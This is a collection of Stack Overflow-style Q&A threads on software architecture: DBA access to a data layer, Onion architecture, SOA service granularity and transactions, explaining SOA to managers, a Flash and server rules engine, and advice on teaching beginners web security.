Situation: The dba is an offsite contractor who keeps the entire DAL code checked out in TFS. It would be nice as the front end developer to be able to add columns, and tweak procs and whatnot, without having to rely on waiting for this dude to respond to your emails to do the work.
Question: What would be a recommended solution/process that would allow for more rapid/agile development, while maintaining data integrity as well as peace love and happiness among the team?
Im getting some good feedback on Programmers HERE
There is no general technical answer to your question (unless you can define a very limited kind of needed access, which can be supplied via an API he provides for you in the DAL, etc.).
Assuming you already tried to talk with him and probably even escalated the issue, there is probably a valid reason for limiting access (security, data model integrity, performance tuning, version control etc.).
Try to understand the reasoning behind his approach, and to better define your actual needs, it is possible that after that you can formulate an improvement to your architecture (such as the aforementioned API) or your development process. Most importantly, talk frankly about your concerns, communication can go a long way, as long as you are willing to understand the other side.
Related
One of the key benefits provided by Onion architecture is the ability to swap out "infrastructure" elements, such as "Data Access, I/O, and Web Services" (http://jeffreypalermo.com/blog/the-onion-architecture-part-3/).
Jeff says in his post from 2008 that "the industry has modified data access techniques at least every three years".
Does anyone have an example of a reasonably large project where Onion architecture was used and swapping out of key infrastructure elements was subsequently undertaken?
I'm interested to understand:
How common is this scenario, in general?
My instinct tells me that while "data access techniques" may be modified every three years, changes to actual infrastructure for running solutions, which would allow this benefit to be realised, may be a lot less frequent?
What were the conditions were that the solution was operating under originally?
What caused the change in the underlying infrastructure?
Are there lessons to be learned about the practical implications of changing infrastructure in this way, which may allow us to refine original implementations of the Onion architecture?
I'm interested to hear whether there were unexpected changes required beyond just replacing the infrastructure component and implementing the same interface. For example, did the new infrastructure require new arguments to be passed to previously defined methods e.g. SaveOrder(int ID) -> SaveOrder(int ID, bool AllowSiblings, bool SiblingCreated) when moving from a Relational to NoSQL DB model.
Did the implementation of this architecture + rework to migrate to new infrastructure significantly decrease the total effort required, if compared to a traditional, coupled approach?
Do developers find coupled, hard-referenced code easier to write and debug than loosely coupled, indirectly referenced code, but the eventual payoff for infrastructure changes makes this worth it?
Well, IMHO, the primary intent of such architecture style (Hexagoanl, Ports&Adapters, Onion …) is that it allows you to focus on your domain, how you will deliver value instead of focusing first on UI, frameworks or storage issues. It allows you to defer such decisions.
As Jeffrey says, the ability to swap out "infrastructure" elements is a nice side effect of such architecture style. Even if you will not switch from one RDBMS to another every 6 months, it’s quite reassuring knowing that it would be possible doing it without pain, though.
Rather than thinking about changing your storage mechanism on a regular basis or as you said “swapping out of key infrastructure elements”, just think about third parties services that you’d plug to your system. Those are eager to change on a regular basis; you would also switch from one provider to another. This is quite a more common scenario we are used to face with on a more regular basis. In this particular case, the domain behavior won’t change, the interfaces will stay the same, you won’t have to change a single line of code into your core domain layer. Only the implementation made somewhere in your infrastructure layer might have to change. That’s a another noteworthy benefit from that kind of architecture!
Please read this nice Uncle Bob article about Clean Architecture where he explains why the ability to defer critical infrastructure decision is really cool!
--- EDIT ---
Could you provide an example of where you have swapped out a third party service?
We have tons of examples where we switched from one provider to another (from payment providers to live feeds providers or whatever provider). The business stays the same, the domain behaviors are still the same. Changing a provider should not have any kind of impact on your business. You don’t have to change the way your business work, where the value really is, just because you change from one provider to another, it makes no sense. Isolating your domain behaviors in an independent core layer, with no dependencies on any third parties libraries, frameworks or provider services, definitely help you to deal with changes.
I have the feeling that you’re trying to convince yourself whether to go with Onion. You might be on the wrong track only thinking about migrating to new infrastructure related stuff (db, third parties stuff...). Focus on your domain instead. Ask yourself if your domain is complex enough to require such an architecture style. Don’t use a bazooka to kill a fly. As Simon Brown says: "Principles are good, but make sure they’re realistic and don’t have a negative impact"!
If your application is quite small, with no complex business domain, go for classic n-tiers architecture, that’s ok; don’t change things just for the sake of it or just because of any buzzword. But also keep in mind that an isolated core business layer without dependencies, as in Onion architecture, might be very easy to unit test!
Now for your additional questions:
Did the implementation of this architecture + rework to migrate to new infrastructure significantly decrease the total effort required, if compared to a traditional, coupled approach?
It depends! :-) In tightly coupled applications as soon as there’s a new infrastructure element to be migrated, there is little doubt that you’ll surely have to modify code in every layers (including the business layer). But if this application is small, quite straightforward, well organized with a descent test code coverage, this shouldn’t be a big deal. Now, if it’s quite big, with a more complex business domain, it might be a good idea to isolate that layer in a totally separate layer with no dependencies at all, ensuring that infrastructure changes won’t cause any business regression.
Do developers find coupled, hard-referenced code easier to write and debug than loosely coupled, indirectly referenced code, but the eventual payoff for infrastructure changes makes this worth it?
Well, ask your teammates! Are they used to work with IOC? Remember that architecture design and choices must be a team decision. This must be something shared by the whole team.
Our client follows SOA principles and have design web services that are very fine grained like createCustomer, deleteCustomer, etc.
I am not sure if fine grained services are desirable as they create transactional related issues. for e.g. if a business requirement is every Customer must have a Address when it's created. So in this case, the presentation component will invoke createCustomer first and then createAddress. The services internally use simple JDBC to update the respective tables in db. As a service is invoked by external component, it has not way of fulfilling transactional requirement here i.e. if createAddress fails, createCustomer operation must be rolledback.
I guess, one of the approach to deal with this is to either design course grained services (that creates a Customer and associated Address in one single JDBC transaction) or
perhaps simple create a reversing service (deleteCustomer) that simply reverses the action of createCustomer.
any suggestions. thanks
The short answer: services should be designed for the convenience of the service client. If the client is told "call this, then cdon't forget to call that" you're making their lives too difficult. There should be a coarse-grained service.
A long answer: Can a Customer reasonably be entered with no Address? So we call
createCustomer( stuff but no address)
and the result is a valid (if maybe not ideal) state for a customer. Later we call
changeCustomerAddress ( customerId, Address)
and now the persisted customer is more useful.
In this scenario the API is just fine. The key point is that the system's integrity does not depend upon the client code "remembering" to do something, in this case to add the address. However, more likely we don't want a customer in the system without an address in which case I see it as the service's responsibility to ensure that this happens, and to give the caller the fewest possibilities of getting it wrong.
I would see a coarse-grained createCompleteCustomer() method as by far the best way to go - this allows the service provider to solve the problem once rather then require every client programmer to implement the logic.
Alternatives:
a). There are web Services specs for Atomic Transactions and major vendors do support these specs. In principle you could actually implement using fine-grained methods and true transactions. Practically, I think you enter a world of complexity when you go down this route.
b). A stateful interface (work, work, commit) as mentioned by #mtreit. Generally speaking statefulness either adds complexity or obstructs scalability. Where does the service hold the intermediate state? If in memeory, then we require affinity to a particular service instance and hence introduce scaling and reliability problems. If in some State or Work-in-progress database then we have significant additional implementation complexity.
Ok, lets start:
Our client follows SOA principles and
have design web services that are very
fine grained like createCustomer,
deleteCustomer, etc.
No, the client has forgotten to reach the SOA principles and put up what most people do - a morass of badly defined interfaces. For SOA principles, the clinent would have gone to a coarser interface (such asfor example the OData meachsnism to update data) or followed the advice of any book on multi tiered architecture written in like the last 25 years. SOA is just another word for what was invented with CORBA and all the mistakes SOA dudes do today where basically well known design stupidities 10 years ago with CORBA. Not that any of the people doing SOA today has ever heard of CORBA.
I am not sure if fine grained services
are desirable as they create
transactional related issues.
Only for users and platforms not supporting web services. Seriously. Naturally you get transactional issues if you - ignore transactional issues in your programming. The trick here is that people further up the food chain did not, just your client decided to ignore common knowledge (again, see my first remark on Corba).
The people designing web services were well aware of transactional issues, which is why web service specification (WS*) contains actually mechanisms for handling transactional integrity by moving commit operations up to the client calling the web service. The particular spec your client and you should read is WS-Atomic.
If you use the current technology to expose your web service (a.k.a. WCF on the MS platform, similar technologies exist in the java world) then you can expose transaction flow information to the client and let the client handle transaction demarcation. This has its own share iof problems - like clients keeping transactions open maliciously - but is still pretty much the only way to handle transactions that do get defined in the client.
As you give no platform and just mention java, I am pointing you to some MS example how that can look:
http://msdn.microsoft.com/en-us/library/ms752261.aspx
Web services, in general, are a lot more powerfull and a lot more thought out than what most people doing SOA ever think about. Most of the problems they see have been solved a long time ago. But then, SOA is just a buzz word for multi tiered architecture, but most people thinking it is the greatest thing since sliced bread just dont even know what was around 10 years ago.
As your customer I would be a lot more carefull about the performance side. Fine grained non-semantic web services like he defines are a performance hog for non-casual use because the amount of times you cross the network to ask / update small small small small stuff makes the network latency kill you. Creating an order for like 10 goods can easily take 30-40 network calls in this scenario which will really possibly take a lot of time. SOA preaches, ever since the beginning (if you ignore the ramblings of those who dont know history) to NOT use fine grained calls but to go for a coarse grained exchange of documents and / or a semantical approach, much like the OData system.
If transactionality is required, a coarser-grained single operation that can implement transaction-semantics on the server is definitely going to be much simpler to implement.
That said, certainly it is possible to construct some scheme where the target of the operations is not committed until all of the necessary fine-grained operations have succeeded. For instance, have a Commit operation that checks some flag associated with the object on the server; the flag is not set until all of the necessary steps in the transaction have completed, and Commit fails if the flag is not set.
Of course, if having light-weight, fine grained operations is an important design requirement, perhaps the need to have transactionality should be re-thought.
I frequently hear Service-Oriented Architecture (SOA) being tossed around as a buzzword among non-technical customers or program managers with little concern or understanding for what it actually entails (example: "Can I buy a SOA?"). There's also a lot of misinformation about SOA (example: "Only web apps can use SOA") and a general lack of understanding for its capabilities (example: "SOA can make your make all of your data work together").
What are some key facts that you, as someone who understand the technical side of SOA, use to educate program managers on the appropriate use and understanding of SOA? What's the best way to set the record straight with non-technical folks?
For non technical people I would use the following concept. The whole professional world is service oriented.
Instead of baking a cookie by
youself, you go to the baker.
Instead of trying to cure yourself,
you go to the doctor.
Instead of writing a program, you
ask a programmer to do this for
you.
This implies two major advantages:
Each one does his job better than if
we all were trying to solve all our
tasks separately.
There is a way, which allows non
professionals to communicate with
those, who will solve our task (in
real world such way is money and
business contracts)
In the world of software such architecture is implemented by defining specialized services (applications) which are dedicated to perform specific tasks and by defining protocols, which are solving problem of communications between such applications.
When such architecture is deployed, you get some benefits, which can be also mapped to the real world:
If doctor is unavailable, you cannot
be cured but at least you can get a
cookie from the bakery! In software this means one failed service does not break the whole system.
Usually doctors and bakers do not share the same room and this allows them to operate better. Just like in software you can place each service on its own hardware.
For software world this means, better availability, maintainability, reuse, and reduced costs.
Good luck!
"SOA is like hiring new employees when the job gets too large for the current team." Each part of the whole system is analogous an employee. Managers understand employees ;)
Maybe you have some applications in your company to use as a demonstration.
Try to show them the big picture with lots of loosely dependent services with some common needs/features created by various teams, and pulling out those embedded but commonly used features and use them as service providers.
The other thing that came into my mind is to show them the various connectors that the services can use to communicate (maybe there are some really old screenscraping legacy apps). Also, the message bus concept with normalizing and transaction handling needs to be clarified. In my opinion, non-technical people should see this whole SOA concept as loosely coupled services talking to each other with any kind of messages, where services are written/managed/governed by different teams (so formal service declarations and SLAs can come handy).
Try to avoid mentioning vendors, if possible. Or mention lots of vendors and technologies for each part in order to show them the various options.
I'm working on an app which will, like most apps, have a whole boat load of buisness logic, almost all of which will need to be executed both on the server and the Flash-based client… And I'm trying to figure out the best (read: least complex) way to implement the rules engine.
These are the parameters of the problem:
The rules engine must both run in a web browser (ie, in Flash Player) and on the server. Duplicating the logic (eg, by writing a "server" version and a "client" version) would be an unacceptable risk.
The input/output data is fairly complex, so serialization is a nontrivial problem. We are currently using AMF for all of our serialization needs, and using another protocol would add significant complexity… So it should probably be avoided.
It is infeasible to implement a "rules description language". Experimentation has shown that rules are sufficiently complex that any such language would need to be Turing complete… Which would also add a significant amount of complexity.
The rules engine will not need to make some, but not very many, service calls.
Currently, the best contenders are:
Writing the code in ActionScript, then running it on the server. In theory it's possible to start up an AVM instance, get it long-polling a gateway, then pass data back and forth that way… But that seems less than ideal. Is there a "good" way of doing this?
Writing the code in Haxe. I don't know anything about Haxe's AMF support, so that could be a deal-breaker.
Something involving Tamarin. Seems like a viable option, but I haven't done enough research to tell either way.
So, what do you think? Are any of these options clearly better than others? Is there something I haven't though of that's worth considering?
Finally, thanks for reading this wall of text :)
How much data are you talking about? You can use Air if you want to run it on the server and access a queue or something.
This is a shameless information gathering exercise for my own book.
One of the talks I give in the community is an introduction to web site vulnerabilities. Usually during the talk I can see at least two members of the audience go very pale; and this is basic stuff, Cross Site Scripting, SQL Injection, Information Leakage, Cross Site Form Requests and so on.
So, if you can think back to being one, as a beginning web developer (be it ASP.NET or not) what do you feel would be useful information about web security and how to develop securely? I will already be covering the OWASP Top Ten
(And yes this means stackoverflow will be in the acknowledgements list if someone comes up with something I haven't thought of yet!)
It's all done now, and published, thank you all for your responses
First, I would point out the insecurities of the web in a way that makes them accesible to people for whom developing with security in mind may (unfortunately) be a new concept. For example, show them how to intercept an HTTP header and implement an XSS attack. The reason you want to show them the attacks is so they themselves have a better idea of what they're defending against. Talking about security beyond that is great, but without understanding the type of attack they're meant to thwart, it will be hard for them to accurately "test" their systems for security. Once they can test for security by trying to intercept messages, spoof headers, etc. then they at least know if whatever security they're trying to implement is working or not. You can teach them whatever methods you want for implementing that security with confidence, knowing if they get it wrong, they will actually know about it because it will fail the security tests you showed them to try.
Defensive programming as an archetypal topic which covers all the particular attacks, as most, if not all, of them are caused by not thinking defensively enough.
Make that subject the central column of the book . What would've served me well back then was knowing about techniques to never trust anything, not just one stop tips, like "do not allow SQL comments or special chars in your input".
Another interesting thing I'd love to have learned earlier is how to actually test for them.
I think all vulnerabilities are based off of programmers not thinking, either momentary lapses of judgement, or something they haven't thought of. One big vulnerability that was in an application that I was tasked to "fix up", was the fact that they had returned 0 (Zero) from the authentication method when the user that was logging in was an administrator. Because of the fact that the variable was initialized originally as 0, if any issues happened such as the database being down, which caused it to throw an exception. The variable would never be set to the proper "security code" and the user would then have admin access to the site. Absolutely horrible thought went into that process. So, that brings me to a major security concept; Never set the initial value of a variable representing a "security level" or anything of that sort, to something that represents total god control of the site. Better yet, use existing libraries out there that have gone through the fire of being used in massive amounts of production environments for a long period of time.
I would like to see how ASP.NET security is different from ASP Classic security.
Foxes
Good to hear that you will have the OWASP Top Ten. Why not also include coverage of the SANS/CWE Top 25 Programming mistakes.
How to make sure your security method is scalable with SQL Server. Especially how to avoid having SQL Server serialize requests from multiple users because they all connect with the same ID...
I always try to show the worst-case scenario on things that might go wrong. For instance on how a cross-site script injection can work as a black-box attack that even works on pages in the application that a hacker can’t access himself or how even an SQL injection can work as a black box and how a hacker can steal your sensitive business data, even when your website connects to your database with a normal non-privileged login account.